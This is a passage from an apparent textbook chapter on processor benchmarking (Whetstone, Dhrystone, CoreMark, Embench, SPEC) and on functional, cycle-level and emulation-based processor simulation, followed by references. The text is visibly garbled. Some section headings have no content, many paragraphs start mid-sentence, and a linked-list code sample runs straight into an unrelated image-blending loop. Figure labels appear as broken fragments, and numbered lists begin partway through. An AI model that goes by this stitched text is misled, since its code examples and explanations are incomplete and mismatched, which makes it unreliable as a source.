which would better predict processor performance for a wide variety of tasks than
MIPS or GOPs.
Let us look at some C language code snippets to highlight the problem looking
at the code. The first example is a common procedure of linked list parsing. We
will look at the inner loop where most algorithm implementations spend most of the
processor time.
struct Node
{void *data;
struct Node *next;
};
struct Node* node;
886 G. E. Martin et al.
Instantiate_and_initialise_Node_struct (node);
for (h=0;h<height;h++)
for (w=0;w<width;w++)
output_image[h][w]=image1[h][w]*alpha+
(1-alpha)*image2[h][w];
Whetstone
The first version of Whetstone (Curnow and Wichmann 1976) was developed in
1972 and in its modified form is still used today. In its current form, it is a small
amount of synthetic code which contains loops, function calls, fixed- and floating-
point computations. In this context, “synthetic” means it does not implement
algorithms or applications but contains artificial code. Although Whetstone attempts
to include different types of computation and memory accesses as a “universal”
benchmark would do, the benchmark is heavily weighted by mathematical com-
putation using floating point, and branches. To achieve a good performance on
Whetstone, the processor must have double-precision floating-point operations in
its instruction set. A good branch predictor and branch resolution architecture will
help achieve higher performance on Whetstone. For general purpose application
processors which are intended to run different programs, fetch large amounts
of instructions (Whetstone instruction size is small and can fit into a modern
level one instruction cache), perform frequent context switching, performance on
the Whetstone benchmark does not correlate well with real-world performance.
However, if the intended applications are floating DSP-type applications, Whetstone
is useful at an early stage of selecting a processor, although so outmoded as of 2020
that its use is rarely reported.
Linpack
Dhrystone
The first version of Dhrystone was developed in 1984 (version 1.1). Just like
Whetstone, this is a synthetic benchmark and does not represent any real-world
application. Just like Whetstone, the code contains loops, branches, function calls,
and fixed-point computations, but no floating-point computations. Dhrystone was
designed to better represent execution patterns and types of computation encoun-
tered in general purpose processors. There are several drawbacks in Dhrystone
25 Processor Simulation and Characterization 889
(a) The outputs of some functions are not used, and compilers in the optimization
stage would remove those functions as dead code, so they will not be executed
at all, which works against the intention of the Dhrystone benchmark, giving
extremely good and incorrect Dhrystone scores.
(b) Dhrystone contains too much string manipulation code, so the score is heavily
weighted by the ability to manipulate strings. String manipulation is not
correlated well with the types of computations and memory accesses where
general purpose computers and controllers spend most of their computational
performance today. Performance on string manipulations do not correlate well
with general purpose DSPs and controllers.
(c) Dhrystone’s use of libraries makes it heavily dependent on library opti-
mizations, and therefore more dependent on the compiler which skews the
benchmarking of the underlying processor hardware.
(d) Just like Whetstone, Dhrystone is a small program and could fit completely into
instruction caches of modern processors. Therefore, Dhrystone does not well
characterize the instruction caching subsystem, the effect of the system bus, and
external memory bandwidth and latency.
Subsequent versions of Dhrystone (2.0 and 2.1) attempted to modify the code
to prevent dead code elimination by the compiler. The effort, however, was only
partially successful. To obtain a meaningful score, one must disable dead code
elimination typically through compiler optimization flags.
In 2020, Dhrystone is still used as a measure of performance primarily in
controller-type processors, although even for these types of applications, there are
better and newer benchmarks. For the past two decades, the consensus has been
that Dhrystone is on its way out, and over the next couple of years, it would
be uncommon to ask for or provide Dhrystone scores. Nonetheless, as of 2020,
Dhrystone is still often used. For more information, see Weiss (2002).
CoreMark
CoreMark does not contain string manipulations. In fact, it does not make
library calls within the timed part of the code. This makes it independent of library
optimizations and makes it more of a hardware benchmark than a library benchmark.
Like Dhrystone, it is a synthetic benchmark which does not include floating-point
computations. It contains integer arithmetic, matrix manipulations, linked-list pars-
ing, state machines, data-dependent conditional branches, and CRC computations.
Like Whetstone and Dhrystone, the instruction size and data size are also small
on most target processors, so this benchmark could fit completely into instruction
caches or data caches of modern processors. As far as instruction cache is concerned,
the situation here is somewhat “worse” than that of Whetstone and Dhrystone. This
is because without library calls, the amount of code which gets cached is less than
that of Whetstone and Dhrystone where library code gets cached as well.
Therefore, like Dhrystone and Whetstone, it is not useful for the characterization
of the caching subsystem, the effect of the system bus, and external memories’
bandwidths and latencies.
CoreMark is a good benchmark for general purpose and controller types of
processors. For digital signal processing, it is not an adequate benchmark, because
it does not perform mathematical operations such as multiply-accumulate, repre-
sentative of such processing, nor does it contain a sufficient amount of independent
data and operations which can be exploited through parallel data and instruction
processing (VLIW and/or SIMD). Its lack of floating point makes it unsuitable for
processors which emphasize floating point capabilities.
Overall CoreMark is a big improvement for estimating the performance of
embedded controllers. Currently it has gained enough traction to be considered
a successor of Dhrystone. However, processor vendors and their customers may
still want Dhrystone numbers, most of the time in addition to, and not instead
of CoreMark. EEMBC has released a cost-free version of Coremark on Github
(Coremark Github 2020).
Embench
Rounding up the short list of the most common no-cost benchmarks is Embench.
Unlike previously discussed benchmarks, Embench is not a single benchmark but
a suite of different benchmarks. It is still under development, as of the time of this
writing in late 2020. In fact, Embench’s philosophy is to adapt to new situations
and benchmarking new architectures over time as the need arises (Embench 2020;
Patterson 2020). To quote from its website as to is purpose:
Dhrystone and Coremark have been the de facto standard microcontroller benchmark suites
for the last thirty years, but these benchmarks no longer reflect the needs of modern
embedded systems. Embench™ was explicitly designed to meet the requirements of
modern connected embedded systems. The benchmarks are relevant, portable, and well
implemented.
synthetic code). The applications are selected to cover three axes of processor
architecture: computational power, memory accesses, and branches, and implement
diverse algorithms. To illustrate the diversity of the applications in the Embench
suite, it is sufficient to name some: 32-bit CRC checking, cubic root solver, Huffman
encoding and decoding, dot product, FIR, IIR, DCT, codebook search, integer
matrix multiplication, matrix inversion, N-body problem calculations, Regex, mean,
standard deviation, correlation, etc. Embench uses fixed-point, single-precision
floating-point as well as double-precision floating-point computations. The original
code for individual applications comprising the suite was not written specifically
for Embench; they come from various sources including earlier benchmarks, but the
“pick” of individual applications is what makes the prospect for wide adoption of
Embench good.
Finally, it is worth to mention the use of Embench for caching and external
memory access performance estimation. Despite the many applications comprising
Embench, the total code size is small, moreover applications warm up caches before
the timed portion of the code by design, so the suite is not designed to stress the
caching system.
SPEC CPU
SPEC CPU (SPEC CPU 2020) stands out among the benchmarks discussed here by
its code size. SPEC has large data and code, which are unlikely to fit into Level One
(L-1) cache. It would therefore be more likely affected than the other benchmarks by
the performance of the caching system and bus and external memory characteristics.
This is a commercial benchmark suite, and there is a cost associated with
obtaining the benchmarks. SPEC is a suite of applications which consists of non-
synthetic code. The first version of SPEC CPU was made available in 1989 and
consisted of 10 programs. The current version of SPEC CPU has 43 benchmarks
organized into four suites:
copy of SPECspeed can also benefit from multiple threads and cores; however, if
the compiler does not support OpenMP, it must be capable of auto-parallelization.
The benchmarks are distributed as source code. To compile all of them, one needs
C99, C++2003, and a Fortran-2003 compiler. This may pose a challenge when
trying to benchmark embedded or soft cores from smaller processor vendors without
a large software ecosystem.
EEMBC
Summary
In the previous sections, we looked at the amount of resources available on the pro-
cessor and use of common standard benchmarks to predict processor performance.
The goal of that section was to describe methods to estimate processor performance
on a variety of tasks and thus aid in selecting the right processor or architecture.
In this section, we will look at the problem of estimating processor performance
when the applications for which the processor will spend most of its time are known.
In this scenario, the performance of the candidate processor on common standard
benchmarks of the previous section is less relevant: our goal is to perform a
particular known algorithm on a frame in less than a certain amount of time within
a given power budget (and most likely an area budget as well, if this is a chip-level
design using a soft-core processor).
Estimation Analysis
As far as the architectural fit and speed of the processor is concerned, the selection
of the processor can take place at different levels: selecting a processor based on its
fixed architecture, selecting appropriate extension packages to the processor base
ISA, and introducing user-defined individual instructions or operations.
Selecting the processor based on its fixed architecture is the coarsest way of
obtaining architectural fit and frequently carried out by balancing the amount of
available computational resources and bandwidth with the amount required by the
algorithm. For example, if the algorithm is MAC limited and requires executing 500
million MACs per second, the processor must be capable of executing at least 500
million MACs per second.
894 G. E. Martin et al.
At the next level where the designer extends the processor with a custom ISA
package, a more detailed analysis of the algorithm must be carried out to flesh out
frequent computational and memory access patterns and try to match them against
the ISA of an extension package.
Let us continue with the example of the affine transform from section “Example:
Affine transform of 2-D Image.” The goal is to sustain a transform of height (H) by
width (W) image pixels (for the sake of this example, assume a grayscale image) at a
rate of R frames per second. Looking at a standard benchmark, such as a CoreMark
score, does not tell us whether we will sustain the transform for this image size and
frame rate. Moreover, although we may sustain the needed throughput, the power
consumption and area of the core may be an overkill for the job.
As the first step, we need to establish the required computational resource: H x
W x R x number of required computations per pixel (Cp). Computations per pixel is
not a universal metric; it begs the question of what computations and how they map
onto the ISA. Is multiply-accumulate one operation or two operations: multiply and
add?
The next question is: are we limited by data dependencies? If the number
of required computations per pixel is less than the number of available required
computations per pixel, but there is a dependency between computations, they
cannot be carried out in parallel.
The next question relates to memory bandwidth. In some cases, the processor
can be designed (such as an extension for neural networks) to be capable of many
MACs per load, relying on the fact that weights or data are reused and multiple
operations are performed on data or weights between reading them from memory
and writing the results back to memory. If a high MAC to bandwidth architecture
is used to implement affine transforms, the computational blocks could quickly be
starved waiting for data to come from memory and then stalled waiting for data to
be written to memory.
The question of bandwidth is not just limited to the maximum bandwidth
available between the core and the memory subsystem but also to the actual
bandwidth limited by the access pattern of the algorithm. The affine transform is a
good example where data is not loaded or stored in aligned contiguous patterns. For
example, if we can load N bytes of aligned contiguous data from memory, this does
not mean that such a performance can be achieved if N bytes are at noncontiguous
addresses in memory. If a simple memory management subsystem and ISA are used,
the data needs to be loaded using the N-byte word it is contained within. Therefore,
if each byte of data belongs to a different N-byte word, to load N bytes of data, we
need N N-word loads instead of just one. This might not be a big problem for narrow
machines when N is small, for example, 1, 2, or 4 bytes, but it becomes extremely
inefficient for wider machines, for example, with N= 64, 128, or more bytes.
If the memory subsystem involves caches, as opposed to tightly coupled memory
and direct memory access engine transfers, the analysis becomes much more
complicated.
Continuing with the example of the affine transform, our design-oriented
approach can be broken into the following steps:
25 Processor Simulation and Characterization 895
Let us consider examples of evaluating RISC-V cores and soft cores from Cadence
Tensilica for implementing the affine transform. There are also soft cores such
as those from Arm, ARC, CEVA, and MIPS which may be considered, but we
limit ourselves to two to get the main points across. Tensilica is representative
of commercial extensible processor architectures; it has a mature set of tools for
customizing cores as well as creating different purpose DSP ISAs. RISC-V is an
open-source standard, which has several extensions either ratified or in definition for
896 G. E. Martin et al.
accelerating different algorithms, and many cores available from academic research
projects, open-source consortia, and commercial suppliers.
Hardware Aspects
We first start with a configurable, extensible processor as a candidate for implement-
ing affine transform on the video feed described above (Fig. 2).
We start by considering the base processor core which is a 32-bit machine, scalar
architecture with one 32-bit instruction executed at a time. If we want a faster
floating-point implementation, we need to select a floating-point coprocessor as
well. Then we calculate the number of operations identified in the implementation of
section “Algorithms” sustained per second against the capability of the base core.
If the base core cannot sustain such a load, we can design custom instructions to
accelerate the implementation or consider extended DSP cores. Beyond the base
Cadence-Tensilica core are families of various application-oriented DSPs including
a Vision DSP family. In the Vision family, there are two predefined vision DSPs
which give a good architectural fit to this application space. Looking further into the
vision DSP family for a resource match, we find that DSP two (Vision Q7) has twice
the number of MACs as DSP one (Vision P6), and can run at a higher frequency than
DSP one.
Further, if DSP two ISA lacks the required performance, we could consider
adding further custom instructions to accelerate our transform. The DSP two ISA
is not specifically optimized for affine transforms; rather the ISA is optimized
for a blend of video and image processing algorithms and should provide good
performance for affine transform of an image. The computational part of its
architecture includes the capability of executing up to five SIMD operations in a
single VLIW instruction bundle. Each of the five SIMD operations can operate on
512-bit wide inputs, i.e., 64 operations on 8-bit data, 32 operations on 16-bit data
Base Predefined
or Vision
extension? DSP?
Custom
usto DSP
P one
o
instructions? or
two?
Custom
usto
instructions?
25 Processor Simulation and Characterization 897
Base
or V
Vector?
extension?
met
Parameters?
Custom
usto
instructions?
Custom
usto
instructions?
Software Aspects
Now that we have looked at the hardware aspects of implementing the affine
transform, let us look at some of the software aspects.
Section “Example: Affine Transform of 2-D Image” contains an example of an
implementation with pseudo-code (Listing 1). That implementation assumes one
32-bit floating-point operation is performed at a time and the number of operations
is expressed as the number of 32-bit floating-point operations.
Analyzing the algorithm, we see that computations for every pixel are indepen-
dent of each other; they can be performed in parallel. We can load multiple pixels,
perform multiplication and additions on the loaded pixels in parallel and store them
in parallel.
For example, these computations are independent:
where vxs, vx, and vy are vector or SIMD variables, each containing 16 32-bit
single-precision floating point numbers. Vision DSP two contains 16-way 32-bit
floating point type as well as two 16-way 32-bit floating point MACs and additions.
So, the original line of code can be accelerated up to 32 times.
Loading these pixels in parallel could be tricky. Naturally every processor can
load and store pixels which are contiguous and aligned to the word. If the image is
aligned on the word boundary of the processor and the image width is a multiple
of the word width, every load brings the maximum possible number of pixels. For
example, for a 512-bit load, the load operation loads 64 8-bit pixels onto a register
or 16 32-bit single-precision floating point numbers. To load multiple bytes or small
words from pseudo-random addresses, many wide machines including DSP one
and two feature operations designed to perform such operations efficiently. Such
operations, found in many DSPs, are called gathers (for loads) and scatters (for
stores). The RISC-V vector extension specifies such operations as well. These are
loads and stores with the vector-indexed addressing mode.
25 Processor Simulation and Characterization 899
The basic idea here is that wide memories connected to the machine (for
example, 512-bit interfaces) may be constructed from narrower (for example, 32-bit
wide) individually addressable memory macros forming 32-bit wide individually
addressable memory sub-banks. In the absence of sub-bank conflicts (no more than
one access per sub-bank), all sub-banks can be accessed in parallel even though the
data items comprising 512 bits could be at pseudo-random discontinuous addresses.
We might further improve the performance by considering that DSP two is a
5-way VLIW machine, and we can perform loads, multiple MACs, and scatter in
parallel.
The straightest way of implementing the pseudo-code of section “Algorithms” is
to use the corresponding reference C code, give it to the compiler, and expect the
compiler to figure out that multiple iterations can be performed in parallel with the
number of iterations reduced. This code is for illustrative purposes only; on a real
implementation, the programmer or compiler may optimize it further:
for x 0..W-1
# compute corresponding position in source image (xs,ys)
float xs = a11*x + a12*y + a13
will become:
for x 0..(W/(N/2))-1
xb_vecN_2xf32 vxs = a11*vx + a12*vy + a13
Here all the vector operations are 512-bit operations or 16 32-bit floating-point
multiplies and adds.
In the first part (vectorization), a RISC-V vector compiler will have a similar
flow, but the second part, where a VLIW compiler tries to schedule multiple
operations into one instruction, does not exist for RISC-V vectors unless a RISC-
V vector extension processor uses an underlying VLIW approach. More likely, a
RISC-V vector extension processor will use a scalar, in-order superscalar or out of
order architecture which may extend to vector operations, and if it is capable of
executing more than one instruction in parallel, the schedule will be determined by
the machine’s hardware dynamically during runtime.
Different algorithms and their reference C implementations present different
degree of difficulties for auto-vectorization by the compiler. In many cases, auto-
vectorization will fail.
The causes of the compiler’s failure to auto-vectorize may be divided into two
categories:
900 G. E. Martin et al.
will become:
xb_vecN_2xf32 a, b, c;
a= MULN_2XF32(b, c);
Custom Instructions
As was mentioned before, if the machine still does not meet the computational
requirements, custom instructions can be introduced to accelerate cycle perfor-
mance.
Looking at the pseudo-code of section “Algorithms,” we can see that bilinear
interpolation could be a candidate for a new operation.
Here is an example:
t = tl + (tr-tl)*xsf;
now has one-third the number of operations (assuming all variables are contained in
registers, no spills, and excluding the final store):
t=LININTERP(tl, tr, xsf);
b=LININTERP(bl, br, xsf);
dstimg[x][y] = LININTERP(t, b, ysf);
In this and the previous section, we have looked at using code as a way of predicting
processor performance in the real world while still at an early design stage. Once
the methodologies described here have produced an acceptable result, the processor
becomes a candidate processor. The next step will be to figure out the requirements
on the performance of the subsystem. This includes considering the performance
of higher latency memories: L2, L3, etc., performance of the bus to which the core
is connected, coherence and synchronization overheads in a multicore subsystem.
All these need to be considered – the cost of making a mistake in estimating the
performance at this early stage is the most expensive mistake in a project.
Throughout the last two sections we talked about running or executing code at
an early stage of a project to determine processors capabilities or a fit. At such an
902 G. E. Martin et al.
early stage, silicon is not available. Therefore, one needs some sort of a simulator
to benchmark the code. A simulator can also be used to get more visibility into the
reasons for performance issues than could be obtained from actual hardware. This
is the subject of the next section.
Processor Simulation
In this section, we will discuss commonly used modelling techniques underlying the
assessment of algorithm performance on a target processor architecture: simulation
and emulation to characterize processor functionality, performance, and efficiency.
These modelling techniques vary in speed, accuracy, and configurability, and often
require the use of multiple techniques and associated tools at different stages of
processor exploration, design, and characterization at the right level of modelling
abstraction.
Functional Simulation
Definition
Functional simulation of a processor simply models the functional behavior of
its instruction set architecture (ISA). It helps determine if the implementation
of a software program is functionally correct. It rarely encompasses any micro-
architectural features of the target processor. It merely emulates one instruction at a
time by computing the outputs for a given set of inputs. Every simulated instruction
is assumed to take one clock cycle to complete. Functional simulators are also quite
useful for early architectural simulation as they can generate instruction-level traces,
which typically have information that can be consumed by trace-based statistical
analysis tools.
of those programs have the most impact on overall performance, and thus serve as
relevant portions for detailed performance characterization.
For a given processor architecture, CPU time can be reduced by increasing the
clock speed, or lowering the CPI, or lowering the program’s instruction count, or
some combination of them. Applying this analysis to a set of programs with diverse
instruction mix (McCallum and Chua 1987) can be a useful exercise in estimating
relative performance differences among those programs even with simple functional
simulation-based performance models.
the locality of references to minimize time and power spent in accessing data
elements in memory.
As an example, for processor architectures that support simultaneous memory
access of multiple agents in the same cycle, a popular technique to improve
performance is the use of memory banking (Sudarsanam and Malik 1995).
Open-Source Simulators
Over decades, the computer architecture community has developed and promoted
various functional simulators for industry standard ISAs – MIPS, x86, Arm, RISC-
V, etc. – for education, academic research, and sometimes for industry use too.
To name a few, some of the well-known open-source simulators in use today
are SimpleScalar (Burger and Austin 1997), Gem5 (Binkert et al. 2011, Abudaqa
et al. 2018, Lowe-Power et al. 2020), QEMU (Qemu 2020), ESESC, and Spike
(https://github.com/riscv/riscv-isa-sim). Some of these simulators support different
ISAs, offer varying levels of configurability between supported CPU features, and
extensibility for custom instructions.
Commercial CPU vendors provide accompanying proprietary software
toolchains, which typically include functional ISA simulators often integrated
with an integrated development environment (IDE), for easier evaluation and
use of their CPUs. For example, Cadence Tensilica offers TurboXim – a fast,
functional simulator for the Xtensa ISA – that can be used to quickly simulate
target applications on Xtensa ISA, debug functional issues in the application, and
profile the application to gather micro-architecture agnostic performance metrics as
a first-order estimate of performance.
25 Processor Simulation and Characterization 905
Cycle-Level Simulation
Definition
A more accurate measure of code performance on a target processor requires a
cycle-level simulation of that processor. While it is not strictly necessary for a cycle-
level simulator to also fully model the functionality of a processor or a feature,
they often do, which also helps with more fine-grained functional debugging.
Cycle-level simulators are more accurate as they model micro-architectural details
of processor components. At the initial stages, standalone cycle-level models of
individual processor components may be adequate to estimate performance of those
components, but to achieve very high overall model accuracy, it may become
necessary to model interactions between those components at a cycle level, such as
interactions between the core pipeline, multiple branch predictors, and instruction
cache to accurately model a complex event.
Performance Analysis
Cycle-level simulators primarily track the number of cycles needed to execute an
instruction stream. They count pipeline stalls and replays, memory delays and
conflicts, branch penalties among other multi-cycle events, which results in more
accurate performance measurement at the cost of longer simulation time. A useful
optimization for long simulation time is the use of statistical sampling. A hybrid
simulation mode where an application is run in the cycle-level mode for a small
percentage of time and run in the fast-functional mode for most of the time can
yield a good balance between cycle-count accuracy and execution runtime.
Optimization
With the aid of cycle-level models – standalone or integrated – it is feasible
to analyze application code more closely for performance bottlenecks. A basic
analysis may just be determining upper/lower bounds of code performance for a
given component or a processor configuration. The next stage of analysis could be
either changing the code itself to measure performance on a given configuration, or
changing the configuration to measure performance on a fixed piece of code (such as
a benchmark). Sometimes, depending on the available feature set of a processor and
the nature of the software algorithm, one may undertake data type precision analysis
to optimize the algorithm to achieve highest performance on the target processor.
It is often useful to also study how data placement in memory affects processor
performance and if the target processor allows for it, take advantage of features like
memory banking that allow concurrent memory accesses in the same cycle.
Configurability
An important characteristic of cycle-level models and simulators is the ability to
configure various attributes of processor components. Configurability enables rapid
design space exploration, model verification, and easy model extension to support
new features, which may be something as trivial as adding a new instruction to the
ISA. It is always a trade-off in simulator development on just how much generality
to offer versus modelling fixed configurations with a high level of accuracy.
Open-Source Simulators
There are several open-source cycle-level CPU instruction set simulators (listed
in “Open-Source Simulators”) used by students, researchers, and engineers. These
simulators often support multiple target architectures (such as Arm, SPARC, MIPS,
Intel PC, PowerPC, RISC-V, etc.), multiple CPU devices, and generally some degree
of configurability in the types of components being modelled. The nature of the
CPU configuration being modelled would largely determine the accuracy and speed
of any such simulator.
In addition, commercial CPU vendors often offer proprietary simulators for
cycle-level simulation of their processors. As an example, the Cadence Tensilica
Xtensa and Synopsys ARC processors come with proprietary simulators that support
the full degree of configurability offered by their platform to allow SoC architects
and software developers to analyze and optimize application code to the target
processor.
A further approach to cycle-level simulation is to use RTL or translated RTL
(Verilator). Arm provides Cycle Models of their CPU, which are generated based
on the IP configuration by their IP Exchange portal (ARM 2021).
25 Processor Simulation and Characterization 907
Hardware Emulation
Definition
Hardware emulation is the process of modelling a certain hardware component (such
as a processor) purely in software or with different hardware. While simulators
model the functions of a piece of hardware, emulators, on the other hand, attempt
to also model the internal workings of that piece of hardware. Often, emulating new
hardware designs with existing hardware offers many advantages, including faster
program execution, more accurate functional verification, and in some cases, even
PPA estimation. Thus, hardware emulation may encompass software models such
as Qemu or hardware platforms such as Cadence Palladium, Synopsys Zebu, and
Mentor Veloce. A good discussion of hardware-assisted emulation platforms can be
found in Schirrmeister (2016).
Emulation Modes
There are various types of emulators or emulation modes based on the fidelity with
which they emulate a system. Application mode models just enough components
(CPU, memory, IO) to execute a workload. This model is often enough to measure
performance but does not simulate any OS. Full platform mode models a broader set
of components including network, disk, and other peripherals. Hybrid models use
software emulation components in conjunction with hardware models (FPGA). In
general, hardware emulators are meant to provide a high accuracy, stable, flexible,
and fast model to execute real application software on a piece of target hardware
that is being modelled on a different hardware.
processor ISS, as discussed earlier, was generated to support the exact configuration
and extended ISA of the particular processor. To an almost complete extent,
the XTMP modelling approach was subsumed by a SystemC approach, XTSC,
that allowed much easier integration into open-source and third-party commercial
system modelling tools, so we will discuss only the SystemC-based approach here.
The processor models have many introspective model-query methods that permit
all the relevant characteristics of a particular configuration (for example, numbers
and types of memory interfaces) to be determined, which allows the dynamic
creation of integration wrappers for the processor models.
In addition, the interfaces supported include cycle-accurate transaction-level
interfaces, fast-functional transaction-level interfaces, and cycle-accurate pin-level
interfaces, which allow integration into several different types of system models.
The XTSC modelling environment also includes several generic device models
(e.g., memories, connectors, routers, DMA) that are configurable and allow the man-
ual construction of relatively complex system models for design space exploration.
XTSC supports several system simulation use models: single-processor simula-
tion with models of various external devices, including memories and peripheral
blocks; multiprocessor simulation with both Xtensa and other processors, complex
buses or networks-on-chip, and hardware accelerators; mixed system and HDL
simulation using pin-level transactors and interfaces to Verilog simulation of
hardware blocks; and virtual prototype simulation. All these use cases permit,
where supported, both cycle-accurate simulation and fast-functional (compiled
code) simulation.
The system modelling tools then support software development and functional
verification; system and software profiling; and debugging.
When used as a standalone SystemC-based modelling tool, XTSC supports many
utility functions that otherwise are offered in third-party environments, such as
logging, easy setup and integration, out-of order simulation in fast-functional mode,
and direct memory access methods. Although developed prior to SystemC TLM2
abstractions, it supports TLM2 using transaction adaptors.
The use of an industry standard such as SystemC allows easier integration of the
processor simulators into third party proprietary ESL system tools. Over the years,
such integrations have been done with CoWare, Virtio and VaST System Technology
(all acquired by Synopsys, and current integration with Synopsys virtual prototyping
tools Platform Architect Ultra and Virtualizer), Rockwell Semiconductor Maxsim
(that became a spinoff Axys Design Automation, then part of Arm, then part of
Carbon Design, and finally part of Arm again), Imperas (OVPSim), Virtutech Simics
(then part of Intel’s Wind River and then Wind River spun back out of Intel), and
Mirabilis. Some of these integrations are historical and not current, but they show
that use of SystemC XTSC instead of the earlier proprietary XTMP made integration
easier.
As noted earlier, Qemu (Bellard 2005, Qemu 2020) has been used for many years
to build instruction set simulator models for many different processor families –
including x86, Sparc, PowerPC, MIPS, Xtensa, and notably and recently, RISC-
25 Processor Simulation and Characterization 909
V. It has then been integrated into many system or platform models (Lonardi and
Pravadelli 2014; Qemu System 2020) where models of peripherals and buses can
be combined with single or multiple processor models (possibly heterogeneous) to
produce system virtual prototype models that can be used as in the earlier discussion
for software development, functional verification, profiling, and debugging.
Some of the full chip platforms that have been built, as well as using the
processors cited earlier, include various Arm boards, Coldfire, PC emulators, IBM
mainframe emulators, and many more.
Examples
The methodologies discussed in this chapter have been applied over the years
to many different processors with ISAs drawn from several sources. Notable
among them are Synopsys ARC cores, Cadence Tensilica CPUs and DSPs, Ceva
processors, and RISC-V processors including academic research projects and
commercial offerings from providers such as Greenwaves, SiFive, Andes, Codasip,
and Syntacore. All these offerings allow some measure of ISA customization to
allow the cores to be tuned to particular application spaces, whether done by the
provider or the end user. In addition, standard offerings from Arm and the Intel x86
world give fixed ISA alternatives to the ability to customize an application-specific
instruction set processor (ASIP) (Ienne and Leupers 2007).
Applications targeted with these methodologies include wireless communica-
tions (Rowen et al. 2009, Rowen 2012, Heine 2016], vision processing (Rowen
2015), imaging and AI (Efland et al. 2016), cryptography (Marshall et al. 2020),
cryptography in vehicle-to-vehicle communications (Ogawa et al. 2019), and
advanced 64-bit math in a 32-bit RISC (Bit 2019).
910 G. E. Martin et al.
This rich set of applications and the need to choose and possibly tune the ISA
reinforces the importance of the methodologies illustrated here. To illustrate more
deeply, we will summarize the design methodology used in Ogawa (2019). The
authors developed a design to better support cryptographic applications in vehicle-
to-vehicle communications. They went through the following steps:
cryption and key schedule operations, and the Galois Field multiplication. This
was fairly intricate work; the paper has appendices which provide details on the
operations.
10. To test the revised benchmark code (incorporating the instruction extensions
and the data layout directives), the authors used the Synopsys cycle-accurate
processor model. They used test vectors from various industry standards sites
for the cryptographic algorithms. PPA was estimated by targeting an FPGA
implementation of the resulting processor, although of course it could have
been implemented in an SoC. Details are given in the paper of the generated
DesignWare ARC xCAM cycle-accurate models, incorporating the APEX
instruction extensions.
11. The final measurements indicated that application of both instruction extensions
and X-Y memory sped up the PRESENT block cipher application by 17–34
times, at a cost of 4% in FPGA LUTS and 8% in registers.
12. Similarly, for Galois Field Multiplication, the Curve25519 algorithm sped up
by 2.5 times at a relatively low cost of 9% in FPGA LUTS, 15% in registers,
and a small number of DSP blocks and Carry8 primitives.
13. In their conclusion, they discuss that other extensible and configurable proces-
sors could have been the targets for this work, and the methodology approach
could be used with other cryptographic algorithms.
To summarize, the work in Ogawa (2019) is a very good illustration of the design
and methodology approaches discussed in this chapter in practical use.
Conclusion
In this chapter, we have discussed two orthogonal but related concepts: how to
simulate instruction set processors; and how to characterize them, using processor
simulators, in order to make choices as to what processor(s) to use for specific
design projects, and whether they will be standard off-the shelf designs or will be
customized using a number of different possible approaches.
Characterizing processors can be done with standard benchmarks, or application-
specific design code, or a suitable mixture of both. We have reviewed several the
standard benchmarks used over the years and have given examples of how design
code may be used.
Finally, we have shown via examples of processor characterization how these
concepts can be applied to several interesting application areas.
References
Abudaqa AA, Al-Kharoubi TM, Mudawar MF, Kobilica A. Simulation of ARM and x86
microprocessors using in-order and out-of-order CPU models with Gem5 simulator. In: 2018 5th
international conference on Electrical and Electronic Engineering (ICEEE), May 2018. IEEE,
Istanbul, Turkey, pp 317–322
912 G. E. Martin et al.
Marshall B, Newell GR, Page D, Saarinen M, Wolf C (2020) The design of scalar AES instruction
set extensions for RISC-V. In: IACR transactions on cryptographic hardware and embedded
systems (TCHES). 2020
Martin G, Nedeljkovic N, Heine D (2010) Configurable, extensible processor system simulation.
In: Leupers R, Temam O (eds) Processor and System-on-Chip simulation. Springer, Heidelberg,
pp 293–308
The Mathworks (2020). http://www.mathworks.com. Accessed 5 Oct 2020
McCallum JC, Chua T (1987) A synthetic instruction mix for evaluating microprocessor perfor-
mance. IEEE Micro, May/June, 1987. pp 63–80
Mediatek (2020). https://www.mediatek.com/products/smartphones. Accessed 5 Oct 2020
Misra S, Alfa AA, Olaniyi MO, Adewale SO (2014) Exploratory study of techniques for exploiting
instruction-level parallelism. 2014 Global Summit on Computer & Information Technology
(GSCIT), Sousse, 2014, pp 1–6. https://doi.org/10.1109/GSCIT.2014.6970103
Ogawa H, Luther T, Ricardini J, Cunha H, Simplicio Jr. M, Aranha D, Derwig R, Patil H (2019)
Accelerated V2X provisioning with extensible processor platform. IACR Cryptol. ePrint Arch.
2019: 1039 (2019)
Qualcomm (2020). https://www.qualcomm.com/products/application-processors. Accessed 5 Oct
2020
Patterson D (2020) Embench™: recruiting for the long overdue and deserved demise of Dhrystone
as a benchmark for embedded computing. Computer Architecture Today. https://www.
sigarch.org/embench-recruiting-for-the-long-overdue-and-deserved-demise-of-dhrystone-as-a-
benchmark-for-embedded-computing/. Accessed 5 Oct 2020
Qemu. www.qemu.org. Accessed 5 Oct 2020
Qemu System Emulator Targets (2020). https://www.qemu.org/docs/master/system/targets.html.
Accessed 5 Oct 2020.
Risc-V International (2020). http://www.riscv.org. Accessed 5 Oct 2020
Risc-V International Exchange Cores and SOCs (2020). https://www.riscv.org/exchange/cores-
socs/. Accessed 5 Oct 2020
Rowen C et al (2009) A DSP architecture optimised for wireless baseband. In: International
symposium on System-on-Chip. Tampere, Finland, 2009
Rowen C (2012) Power/performance breakthrough for lte advanced handsets, Linley Mobile
Conference, Santa Clara, April 16, 2012
Rowen C (2015) Instruction set innovation in fourth generation vision DSPs, Linley Processor
Conference, Santa Clara, 2015
Schirrmeister F, Bershteyn M, Turner R (2016) Hardware-assisted verification and software
development. In: Scheffer L, Lavagno L, Markov I, Martin G (eds) The EDA handbook, Volume
I, chapter 19, 2nd edn. CRC Press/Taylor and Francis, Boca Raton
Sherwood T, Perelman E, Hamerly G, Calder B (2002) Automatically characterizing large
scale program behavior, ASPLOS X: Proceedings of the 10th international conference on
architectural support for programming languages and operating systems, San Jose, October
2002. pp 45–57. https://doi.org/10.1145/605397.605403
Standard Performance Evaluation Corporation [SPEC CPU] (2020). https://www.spec.org/
benchmarks.html. Accessed 5 Oct 2020
Sudarsanam A, Malik S (1995) Memory bank and register allocation in software synthesis for
ASIPs. In: Proceedings of IEEE international conference on Computer Aided Design (ICCAD),
